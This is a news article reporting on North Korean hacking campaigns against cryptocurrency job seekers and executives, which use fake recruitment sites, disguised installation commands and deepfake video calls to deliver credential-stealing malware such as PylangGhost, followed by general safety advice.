North Korea Targets Crypto Professionals with 80%+ Malware Attacks

North Korea has been actively targeting professionals in the cryptocurrency and blockchain industries with a new wave of malware attacks. These attacks are being carried out through fake job sites and interviews, designed to lure unsuspecting job seekers into installing malicious software on their systems. The malware, known as PylangGhost, is capable of stealing login credentials, browser data, and crypto wallet information, targeting over 80 popular extensions such as MetaMask, Phantom, and 1Password.

The hacking group responsible for these attacks, known as Famous Chollima, has been focusing its efforts on job applicants in India. This group, which has been active since mid-2024 or earlier, has been creating fake job advertisements and skill-testing pages to trick potential victims. The fake applications mimic well-known crypto firms but do not use any of the real companies' actual branding. Instead, they ask questions that are hardly relevant to the supposed jobs in question.

The attack process begins with victims being lured through fake recruitment sites posing as well-known tech or crypto firms. After filling out applications, they are invited to a video interview. During this process, the site asks them to run command-line instructions, claimed to be for installing video drivers, which actually download and install the malware. Once installed, PylangGhost gives attackers full control of the victim's system, allowing them to steal sensitive information.

In addition to these phishing efforts, North Korean hackers have also been using deepfake technology to trick executives into installing malware. The advanced persistent threat group BlueNoroff, also known as Sapphire Sleet or TA444, has been using AI-generated video calls with deepfake bosses to deceive victims into installing malicious software. This sophisticated campaign has been successful in infiltrating Mac systems at a crypto firm, highlighting the growing threat posed by state-sponsored hackers.

The use of deepfake technology in these attacks is a concerning development, as it allows hackers to create convincing and realistic video calls that can trick even the most vigilant individuals. This technology, combined with the use of fake job sites and interviews, makes it increasingly difficult for professionals in the crypto industry to protect themselves from these attacks.

In response to these threats, it is crucial for job seekers in the crypto industry to exercise caution when applying for jobs. They should be wary of unsolicited job offers, avoid running unknown commands, and secure their systems with endpoint protection, multi-factor authentication, and browser extension monitoring. Always verify the legitimacy of recruitment portals before sharing any sensitive information. By taking these precautions, professionals can better protect themselves from the growing threat of cyber attacks in the crypto industry.